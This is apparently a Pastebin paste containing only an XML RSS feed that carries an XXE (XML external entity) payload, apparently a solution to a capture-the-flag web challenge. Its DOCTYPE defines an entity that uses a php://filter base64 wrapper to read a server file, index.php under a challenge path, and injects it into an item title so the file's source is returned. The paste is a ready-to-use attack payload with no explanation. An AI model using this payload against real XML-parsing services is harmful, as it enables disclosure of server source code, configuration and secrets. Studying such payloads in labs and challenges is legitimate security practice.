TheGreenOfficial

Untitled

Feb 6th, 2026
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE title [
  3. <!ELEMENT title ANY>
  4. <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php">
  5. ]>
  6. <rss version="2.0">
  7. <channel>
  8. <title>Test RSS</title>
  9. <link>https://example.com</link>
  10. <description>Test Description</description>
  11. <item>
  12. <title>&xxe;</title>
  13. <link>https://example.com/item</link>
  14. <description>Item description</description>
  15. </item>
  16. </channel>
  17. </rss>
Add Comment
Please, Sign In to add comment